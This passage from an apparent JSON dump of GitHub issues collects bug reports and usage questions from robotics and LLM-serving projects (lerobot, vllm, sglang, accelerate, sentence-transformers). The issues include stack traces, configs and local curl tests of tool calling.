OpenPI structure for compatibility. \nOriginal implementation: https://github.com/Physical-Intelligence/openpi\n`torch_dtype` is deprecated! 
Use `dtype` instead!\nTraceback (most recent call last):\n File \"/home/yu/miniconda3/envs/lerobot/bin/lerobot-eval\", line 7, in <module>\n sys.exit(main())\n File \"/home/yu/copy/vla/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 763, in main\n eval_main()\n File \"/home/yu/copy/vla/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 501, in eval_main\n policy = make_policy(\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/factory.py\", line 412, in make_policy\n policy = policy_cls.from_pretrained(**kwargs)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/pi05/modeling_pi05.py\", line 893, in from_pretrained\n model = cls(config, **kwargs)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/pi05/modeling_pi05.py\", line 842, in __init__\n self.model = PI05Pytorch(config)\n File \"/home/yu/copy/vla/lerobot/src/lerobot/policies/pi05/modeling_pi05.py\", line 541, in __init__\n raise ValueError(msg) from None\nValueError: An incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\n```\n\nMay I kindly ask whether anyone has encountered similar issues?\n", "url": "https://github.com/huggingface/lerobot/issues/2697", "state": "open", "labels": [ "bug", "question", "evaluation" ], "created_at": "2025-12-22T08:54:56Z", "updated_at": "2025-12-22T16:20:01Z", "user": "yqi19" }, { "repo": "huggingface/lerobot", "number": 2696, "title": "RTC does not work.", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- lerobot version: 0.4.3\n- Platform: Linux-5.10.134-17.3.al8.x86_64-x86_64-with-glibc2.35\n- Python version: 3.10.19\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA H20\n- Using GPU in script?: \n```\n\n### Description\n\nI trained pi05 using my own dataset (where the actions are absolute joint angles). The final training loss reached 0.006.\n\nThen I ran examples/rtc/eval_dataset.py.\n`rtc=RTCConfig(enabled=True, prefix_attention_schedule=, max_guidance_weight=100.0, execution_horizon=8, debug=True, debug_maxlen=1000), device='cuda:0', output_dir='rtc_debug_output', seed=42, inference_delay=4, use_torch_compile=False, torch_compile_backend='inductor', torch_compile_mode='default', torch_compile_disable_cudagraphs=True)`\n\n(five debug screenshots omitted)\n\nHowever, when I run the same script with the following parameters:\n`\npython examples/rtc/eval_dataset.py \\\n --policy.path=lerobot/pi05_libero_finetuned \\\n --dataset.repo_id=HuggingFaceVLA/libero \\\n --rtc.execution_horizon=8 \\\n --device=cuda\n`\neverything works fine. 
I would like to know where the error might be occurring.\n\n### Context & Reproduction\n\nThe training parameters are as follows:\n` \"args\": [\n \"--dataset.repo_id=/mnt/model/wlz/real_stack_purple_toy_joint_lerobot\",\n \"--policy.type=pi05\",\n \"--output_dir=./outputs/pi05_training\",\n \"--job_name=pi05_training\",\n \"--policy.repo_id=wlz\",\n \"--policy.pretrained_path=lerobot/pi05_base\",\n \"--policy.compile_model=true\",\n \"--policy.gradient_checkpointing=true\",\n \"--wandb.enable=false\",\n \"--policy.dtype=bfloat16\",\n \"--steps=5000\",\n \"--policy.device=cuda\",\n \"--batch_size=32\",\n \"--policy.input_features={\\\"observation.images.image\\\":{\\\"shape\\\":[3,256,256],\\\"type\\\":\\\"VISUAL\\\"},\\\"observation.images.image2\\\":{\\\"shape\\\":[3,256,256],\\\"type\\\":\\\"VISUAL\\\"},\\\"observation.state\\\":{\\\"shape\\\":[7],\\\"type\\\":\\\"STATE\\\"}}\",\n \"--policy.output_features={\\\"action\\\":{\\\"shape\\\":[7],\\\"type\\\":\\\"ACTION\\\"}}\"\n ]\n`\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2696", "state": "closed", "labels": [ "bug", "question", "policies", "dataset", "CI", "python", "examples", "training" ], "created_at": "2025-12-22T03:22:23Z", "updated_at": "2025-12-22T05:20:39Z", "user": "xiaozhisky1" }, { "repo": "huggingface/sentence-transformers", "number": 3601, "title": "how to finetune a bi-encoder embedding model with multimodal input", "body": "I want to cluster ecommerce products with a bi-encoder. Each product has a name (text) and an image. Can I use sentence-transformers to finetune a bi-encoder model? The training dataset contains product clusters, like:\n\n```\nproduct1_name, product1_img, cluster_id1\nproduct2_name, product2_img, cluster_id1\nproduct3_name, product3_img, cluster_id2\n\nproductm_name, productm_img, cluster_idn\n```\n\nI want to first try defining it as a classification problem (cluster_id1, ..., cluster_idn) and use ArcFace loss, but other suitable losses are also fine.\n\nIs sentence-transformers suitable for my use case? I find SigLIP (something like CLIP) is good at embedding, but its training data is image/text pairs, which is not the same format as my data.\n", "url": "https://github.com/huggingface/sentence-transformers/issues/3601", "state": "open", "labels": [], "created_at": "2025-12-22T02:46:43Z", "updated_at": "2025-12-22T09:09:31Z", "user": "fancyerii" }, { "repo": "vllm-project/vllm", "number": 31096, "title": "[Usage]: Qwen3-Next: Both Instruct and Thinking models don't support function calling", "body": "\nDoes the Qwen3-Next model not support the function calling feature? Test results show some common error scenarios:\n1. The tools should be called, but the content returned something like the following:\n```\n{\n \"choices\": [\n {\n \"message\": {\n \"content\": \"
\\n{\\\"name\\\": \\\"send_email\\\", \\\"arguments\\\": {\\\"userInput\\\": \\\"ALAN\u7684ID\u662f123456\uff0cALAN\uff0c\u4e2d\u56fd\u4eba\uff0c\u82f1\u8bed\u6570\u5b66\u5f88\u725b\\\"}}\\n\",\n \"tool_calls\": []\n },\n \"finish_reason\": \"stop\"\n }\n ]\n}\n```\n```\n{\n \"id\": \"chatcmpl-38af97847cce417a84577fe604d5b31e\",\n \"object\": \"chat.completion\",\n \"created\": 1766119733,\n \"model\": \"Next\",\n \"choices\": [\n {\n \"index\": 0,\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"\\n{\\\"name\\\": \\\"get_weather\\\", \\\"arguments\\\": {\\\"location\\\": \\\"San Francisco\\\", \\\"unit\\\": \\\"celsius\\\"}}\\n\",\n \"refusal\": null,\n \"annotations\": null,\n \"audio\": null,\n \"function_call\": null,\n \"tool_calls\": [],\n \"reasoning_content\": null\n },\n \"logprobs\": null,\n \"finish_reason\": \"stop\",\n \"stop_reason\": null,\n \"token_ids\": null\n }\n ],\n \"service_tier\": null,\n \"system_fingerprint\": null,\n \"usage\": {\n \"prompt_tokens\": 619,\n \"total_tokens\": 647,\n \"completion_tokens\": 28,\n \"prompt_tokens_details\": null\n },\n \"prompt_logprobs\": null,\n \"prompt_token_ids\": null,\n \"kv_transfer_params\": null\n}\n```\n2. Returning to the contents of the parameter list may result in non-standard characters, causing parameter retrieval to fail.\n```\n{\n \"choices\": [\n {\n \"message\": {\n \"content\": \"\",\n \"tool_calls\": [\n {\n \"id\": \"chatcmpl-tool-ad840dff072841759d3ed8a26e21391f\",\n \"type\": \"function\",\n \"index\": 0,\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"\"\n }\n }\n ]\n },\n \"finish_reason\": \"tool_calls\"\n }\n ]\n}\n```\n\n\n", "url": "https://github.com/vllm-project/vllm/issues/31096", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-21T12:02:08Z", "updated_at": "2025-12-23T03:02:02Z", "comments": 0, "user": "PHOEBEMOON0802" }, { "repo": "huggingface/lerobot", "number": 2694, "title": "The GT00T algorithm simply won't run and throws the following error. Could someone please help me fix it?", "body": "The GT00T algorithm simply won't run and throws the following error. 
Could someone please help me fix it?", "body": "n_model.post_layernorm.bias', 'backbone.eagle_model.vision_model.vision_model.post_layernorm.weight']\nTraceback (most recent call last):\n File \"/home/ruijia/miniconda3/envs/lerobot/bin/lerobot-train\", line 7, in <module>\n sys.exit(main())\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/scripts/lerobot_train.py\", line 517, in main\n train()\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/scripts/lerobot_train.py\", line 268, in train\n preprocessor, postprocessor = make_pre_post_processors(\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/policies/factory.py\", line 252, in make_pre_post_processors\n PolicyProcessorPipeline.from_pretrained(\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/processor/pipeline.py\", line 567, in from_pretrained\n loaded_config, base_path = cls._load_config(model_id, config_filename, hub_download_kwargs)\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/processor/pipeline.py\", line 638, in _load_config\n cls._suggest_processor_migration(model_id, f\"Config file '{config_filename}' not found\")\n File \"/home/ruijia/lerobot_code/lerobot/src/lerobot/processor/pipeline.py\", line 1212, in _suggest_processor_migration\n raise ProcessorMigrationError(model_path, migration_command, original_error)\nlerobot.processor.pipeline.ProcessorMigrationError: Model '/home/ruijia/llmweights/GR00T-N1.5-3B' requires migration to processor format. Run: python src/lerobot/processor/migrate_policy_normalization.py --pretrained-path /home/ruijia/llmweights/GR00T-N1.5-3B\n\nOriginal error: Config file 'policy_preprocessor.json' not found\n@kashif @ozten @jpizarrom @julien-c @jbcayrou ", "url": "https://github.com/huggingface/lerobot/issues/2694", "state": "open", "labels": [ "bug", "question", "policies", "CI", "python", "processor", "examples", "training" ], "created_at": "2025-12-21T09:12:14Z", "updated_at": "2025-12-24T00:06:08Z", "user": "wuxiaolianggit" }, { "repo": "huggingface/lerobot", "number": 2693, "title": "Wrist Roll motor not responding", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nlerobot version 0.4.0\n```\n\n### Description\n\nI connected to the lerobot SO101 bot -> set up motors -> calibrated -> tested teleoperation; everything went fine. But after a few hours, when recalibration was done on another system, the wrist roll motor of the follower arm went partially stiff and it is not responding. 
[Used FT SCServo Debugger]\n\n(screenshot omitted)\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2693", "state": "open", "labels": [ "bug", "question", "teleoperators" ], "created_at": "2025-12-21T09:01:51Z", "updated_at": "2025-12-26T10:19:17Z", "user": "CHIRANJEET1729DAS" }, { "repo": "huggingface/lerobot", "number": 2692, "title": "[Bug] Too many errors when training RL in simulation", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n`\n- LeRobot version: 0.4.3\n- Platform: Linux-6.8.0-90-generic-x86_64-with-glibc2.35\n- Python version: 3.10.19\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: N/A\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4090 D\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n\n`\n```\n\n### Description\n\nFirst of all, thank you for your excellent open-source work. \nI've noticed that LeRobot's code has undergone some significant refactoring recently, especially the code in the hil-serl section. Therefore, I want to re-test the hil-serl code.\n\nI followed the official documentation step by step, but I encountered many problems and don't know how to solve them. The documentation: https://huggingface.co/docs/lerobot/hilserl_sim\n\nFirst, I need to record a dataset. 
Therefore, I executed the following script.\n```shell\npython -m lerobot.rl.gym_manipulator --config_path gym_hil/env_config.json\n```\n\nThe gym_hil/env_config.json is like this:\n```\n{\n \"env\": {\n \"name\": \"gym_hil\",\n \"task\": \"PandaPickCubeKeyboard-v0\",\n \"fps\": 10,\n \"robot\": null,\n \"teleop\": null,\n \"processor\": {\n \"control_mode\": \"gamepad\",\n \"gripper\": {\n \"use_gripper\": true,\n \"gripper_penalty\": -0.02,\n \"gripper_penalty_in_reward\": false\n },\n \"reset\": {\n \"fixed_reset_joint_positions\": [0.0, 0.195, 0.0, -2.43, 0.0, 2.62, 0.785],\n \"reset_time_s\": 2.0,\n \"control_time_s\": 15.0,\n \"terminate_on_success\": true\n }\n }\n },\n \"dataset\": {\n \"repo_id\": \"franka_sim_pick_lift_6\",\n \"root\": \"/mnt/hukongtao/codebase/lerobot/franka_sim_pick_lift_6\",\n \"task\": \"PandaPickCubeKeyboard-v0\",\n \"num_episodes_to_record\": 30,\n \"replay_episode\": 0,\n \"push_to_hub\": false\n },\n \"mode\": \"record\",\n \"device\": \"cpu\"\n}\n```\nfrom https://huggingface.co/api/resolve-cache/datasets/lerobot/config_examples/e9cea127f440dab0eb333f8b8007828ce8f48e23/rl%2Fgym_hil%2Fenv_config.json?%2Fdatasets%2Flerobot%2Fconfig_examples%2Fresolve%2Fmain%2Frl%2Fgym_hil%2Fenv_config.json=&etag=%22a4b2ef62f6cee4e31f608639134c07c7e8d3c4ab%22\n\n\nI got my first error:\n```\ndraccus.utils.DecodingError: `processor.gripper`: Could not decode the value into any of the given types:\n GripperConfig: The fields `gripper_penalty_in_reward` are not valid for GripperConfig\n```\nSo I delete gripper_penalty_in_reward in gym_hil/env_config.json. Then I ran the program again. I got another error:\n```\nTraceback (most recent call last):\n File \"/data/hukongtao/miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 196, in _run_module_as_main\n return _run_code(code, main_globals, None,\n File \"/data/hukongtao/miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 86, in _run_code\n exec(code, run_globals)\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/rl/gym_manipulator.py\", line 770, in \n main()\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/configs/parser.py\", line 233, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/rl/gym_manipulator.py\", line 766, in main\n control_loop(env, env_processor, action_processor, teleop_device, cfg)\n File \"/mnt/hukongtao/codebase/lerobot/src/lerobot/rl/gym_manipulator.py\", line 602, in control_loop\n action_features = teleop_device.action_features\nAttributeError: 'NoneType' object has no attribute 'action_features'\n\n```\nI'm certain this is a bug in the code, because in a simulation environment teleop_device is None. 
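For illustration only, a guard along these lines in `control_loop` would avoid the AttributeError (a hypothetical sketch; the `env.action_space` fallback is an assumption on my part, not a verified fix):\n\n```python\n# Hypothetical guard around src/lerobot/rl/gym_manipulator.py::control_loop.\n# In pure-simulation configs teleop_device is None, so action_features\n# has to come from somewhere else; falling back to the env spec is a guess.\nif teleop_device is not None:\n    action_features = teleop_device.action_features\nelse:\n    action_features = env.action_space  # assumption: the env carries the action spec\n```\n\n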
But I don't know the proper way to fix it upstream.\n\n### Context & Reproduction\n\n```\ngit clone https://github.com/huggingface/lerobot.git\ncd lerobot\npip install -e .[all]\npython -m lerobot.rl.gym_manipulator --config_path gym_hil/env_config.json\n```\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\nI tested the hil-serl code in version 0.3.3 of lerobot, and it worked without any problems.", "url": "https://github.com/huggingface/lerobot/issues/2692", "state": "open", "labels": [ "bug", "documentation", "question", "dataset", "simulation", "tests", "examples", "training" ], "created_at": "2025-12-21T08:22:16Z", "updated_at": "2026-01-04T06:19:05Z", "user": "Hukongtao" }, { "repo": "huggingface/accelerate", "number": 3894, "title": "How to specify a different number of processes per node", "body": "I have 2 nodes. The first node has 8 GPUs while the second node has 2 GPUs. I want to specify the number of processes to be 8 and 2 respectively on the two nodes. I'm using the configs below on the two nodes, but it always tries to divide the processes equally between the nodes; with these config files, it starts 5 processes on each node:\n\nNode 1:\n\n```\ncompute_environment: LOCAL_MACHINE\ndebug: false\ndistributed_type: MULTI_GPU\ndowncast_bf16: 'no'\nenable_cpu_affinity: false\ngpu_ids: 0,1,2,3,4,5,6,7\nmachine_rank: 0\nmain_process_ip: xxxxx\nmain_process_port: 5000\nmain_training_function: main\nmixed_precision: fp16\nnum_machines: 2\nnum_processes: 10\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false \n```\n\nNode 2:\n```\ncompute_environment: LOCAL_MACHINE\ndebug: false\ndistributed_type: MULTI_GPU\ndowncast_bf16: 'no'\nenable_cpu_affinity: false\ngpu_ids: 0,1\nmachine_rank: 1\nmain_process_ip: xxxx\nmain_process_port: 5000\nmain_training_function: main\nmixed_precision: fp16\nnum_machines: 2\nnum_processes: 10\nrdzv_backend: static\nsame_network: true\ntpu_env: []\ntpu_use_cluster: false\ntpu_use_sudo: false\nuse_cpu: false\n```", "url": "https://github.com/huggingface/accelerate/issues/3894", "state": "open", "labels": [], "created_at": "2025-12-21T07:09:15Z", "updated_at": "2025-12-21T07:09:15Z", "user": "AIML001" }, { "repo": "vllm-project/vllm", "number": 31091, "title": "[Usage]: Image Embedding Models (CLIP, Siglip, etc)", "body": "### Your current environment\n\n```text\nroot@3904bdeddb91:/vllm-workspace# python3 collect_env.py\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Oct 10 2025, 08:52:57) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version 
: 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA RTX PRO 6000 Blackwell Workstation Edition\nGPU 1: NVIDIA RTX PRO 6000 Blackwell Max-Q Workstation Edition\n\nNvidia driver version : 580.65.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 43 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 64\nOn-line CPU(s) list: 0-63\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7502 32-Core Processor\nCPU family: 23\nModel: 49\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 1\nStepping: 0\nFrequency boost: enabled\nCPU max MHz: 2500.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 4999.95\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr rdpru wbnoinvd amd_ppin arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sev sev_es ibpb_exit_to_user\nVirtualization: AMD-V\nL1d cache: 1 MiB (32 instances)\nL1i cache: 1 MiB (32 instances)\nL2 cache: 16 MiB (32 instances)\nL3 cache: 128 MiB (8 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-63\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; untrained return thunk; SMT enabled with STIBP protection\nVulnerability Spec rstack overflow: Mitigation; Safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Retpolines; IBPB conditional; STIBP always-on; RSB filling; PBRSB-eIBRS Not affected; BHI Not affected\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nVulnerability Vmscape: Mitigation; IBPB before exit to userspace\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n", "url": "https://github.com/vllm-project/vllm/issues/31091", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-21T04:10:10Z", "updated_at": "2025-12-23T03:26:40Z", "comments": 2, "user": "JamesDConley" }, { "repo": "huggingface/lerobot", "number": 2690, "title": "[Bug] Pi0 Inference RuntimeError: Dimension mismatch in Gemma eager_attention_forward (Causal Mask vs Attn Weights)", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2690", "state": 
"closed", "labels": [ "bug", "question", "policies", "dataset", "CI", "performance", "robots", "examples", "training" ], "created_at": "2025-12-20T16:08:36Z", "updated_at": "2025-12-22T09:34:57Z", "user": "SMWTDDY" }, { "repo": "huggingface/lerobot", "number": 2689, "title": "problem regarding to update aloha sim dataset version v2.1 to v3.0", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\nlerobot version 3.0, h100 gpu, openpi repository, training aloha simulation with pi0.5\n```\n\n### Description\n\nDuring training aloha simulation, I updated lerobot aloha sim insertion dataset from compatible with 2.1 to 3.0, the training results showing aloha joints are working weirdly (showing spark of joint actions).\n\nThe dataset conversion followed as below.\n\n```\nlerobot.datasets.backward_compatibility.BackwardCompatibilityError: \nThe dataset you requested (lerobot/aloha_sim_insertion_scripted) is in 2.1 format.\n\nWe introduced a new format since v3.0 which is not backward compatible with v2.1.\nPlease, update your dataset to the new format using this command:\n\npython -m lerobot.datasets.v30.convert_dataset_v21_to_v30 --repo-id=lerobot/aloha_sim_insertion_scripted\n```\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2689", "state": "open", "labels": [ "bug", "question", "dataset", "simulation", "CI", "robots", "training" ], "created_at": "2025-12-20T13:42:39Z", "updated_at": "2025-12-24T00:06:09Z", "user": "conscious-choi" }, { "repo": "sgl-project/sglang", "number": 15524, "title": "[Bug] Deepseek R1 multi-turn tool calling not working", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [x] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [x] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nThe multi-turn tool calling failed with error: `{\"object\":\"error\",\"message\":\"'dict object' has no attribute 'name'\",\"type\":\"BadRequest\",\"param\":null,\"code\":400}`\n\nHere is the example query:\n```\ncurl http://127.0.0.1:7080/v1/chat/completions -H \"Content-Type: application/json\" -d '{\n \"model\": \"deepseek-ai/DeepSeek-R1\",\n \"stream\": false,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather like in San Francisco?\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"I will check the weather for San Francisco. 
Please hold on.\",\n \"tool_calls\": [\n {\n \"id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"{\\\"location\\\": \\\"San Francisco, CA\\\"}\"\n }\n }\n ]\n },\n {\n \"role\": \"tool\",\n \"tool_call_id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"content\": \"70 degrees and foggy\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state (both required), e.g. San Francisco, CA.\"\n }\n },\n \"required\": [\n \"location\"\n ]\n }\n }\n }\n ]\n}'\n```\n\nHowever, the same query works for the image back in August.\n\n### Reproduction\n\n*) Start server on B200\n```\npython3 -m sglang.launch_server \\\n --model-path nvidia/DeepSeek-R1-0528-NVFP4 \\\n --port 7080 \\\n --host 0.0.0.0 \\\n --tp-size=8 \\\n --ep-size=8 \\\n --moe-runner-backend=flashinfer_trtllm \\\n --enable-flashinfer-allreduce-fusion \\\n --tool-call-parser=deepseekv3 \\\n --chat-template=/sgl-workspace/sglang/examples/chat_template/tool_chat_template_deepseekr1.jinja \\\n --speculative-num-steps=3 \\\n --speculative-eagle-topk=1 \\\n --speculative-num-draft-tokens=4 \\\n --speculative-algorithm=EAGLE \\\n --trust-remote-code\n```\n\n*) send query\n```\ncurl http://127.0.0.1:7080/v1/chat/completions -H \"Content-Type: application/json\" -d '{\n \"model\": \"deepseek-ai/DeepSeek-R1\",\n \"stream\": false,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather like in San Francisco?\"\n },\n {\n \"role\": \"assistant\",\n \"content\": \"I will check the weather for San Francisco. Please hold on.\",\n \"tool_calls\": [\n {\n \"id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"{\\\"location\\\": \\\"San Francisco, CA\\\"}\"\n }\n }\n ]\n },\n {\n \"role\": \"tool\",\n \"tool_call_id\": \"call_ab97cb439a5e41cfbdd8960c\",\n \"content\": \"70 degrees and foggy\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state (both required), e.g. 
San Francisco, CA.\"\n }\n },\n \"required\": [\n \"location\"\n ]\n }\n }\n }\n ]\n}'\n```\n\n### Environment\n\n```\nPython: 3.12.3 (main, Nov 6 2025, 13:44:16) [GCC 13.3.0]\nCUDA available: True\nGPU 0,1,2,3,4,5,6,7: NVIDIA B200\nGPU 0,1,2,3,4,5,6,7 Compute Capability: 10.0\nCUDA_HOME: /usr/local/cuda\nNVCC: Cuda compilation tools, release 12.9, V12.9.86\nCUDA Driver Version: 580.95.05\nPyTorch: 2.9.1+cu129\nsglang: 0.5.6.post2\nsgl_kernel: 0.3.19\nflashinfer_python: 0.5.3\nflashinfer_cubin: 0.5.3\nflashinfer_jit_cache: Module Not Found\ntriton: 3.5.1\ntransformers: 4.57.1\ntorchao: 0.9.0\nnumpy: 2.3.5\naiohttp: 3.13.2\nfastapi: 0.124.2\nhf_transfer: 0.1.9\nhuggingface_hub: 0.36.0\ninteregular: 0.3.3\nmodelscope: 1.33.0\norjson: 3.11.5\noutlines: 0.1.11\npackaging: 25.0\npsutil: 7.1.3\npydantic: 2.12.5\npython-multipart: 0.0.20\npyzmq: 27.1.0\nuvicorn: 0.38.0\nuvloop: 0.22.1\nvllm: Module Not Found\nxgrammar: 0.1.27\nopenai: 2.6.1\ntiktoken: 0.12.0\nanthropic: 0.75.0\nlitellm: Module Not Found\ndecord2: 2.0.0\nNVIDIA Topology: \n\tGPU0\tGPU1\tGPU2\tGPU3\tGPU4\tGPU5\tGPU6\tGPU7\tCPU Affinity\tNUMA Affinity\tGPU NUMA ID\nGPU0\t X \tNV18\tNV18\tNV18\tNV18\tNV18\tNV18\tNV18\t0-55,112-167\t0\t\tN/A\nGPU1\tNV18\t X \tNV18\tNV18\tNV18\tNV18\tNV18\tNV1", "url": "https://github.com/sgl-project/sglang/issues/15524", "state": "closed", "labels": [], "created_at": "2025-12-20T10:31:36Z", "updated_at": "2025-12-21T01:29:43Z", "comments": 2, "user": "ynwang007" }, { "repo": "vllm-project/vllm", "number": 31066, "title": "[Doc]: Formatting issue in markdown file", "body": "### \ud83d\udcda The doc 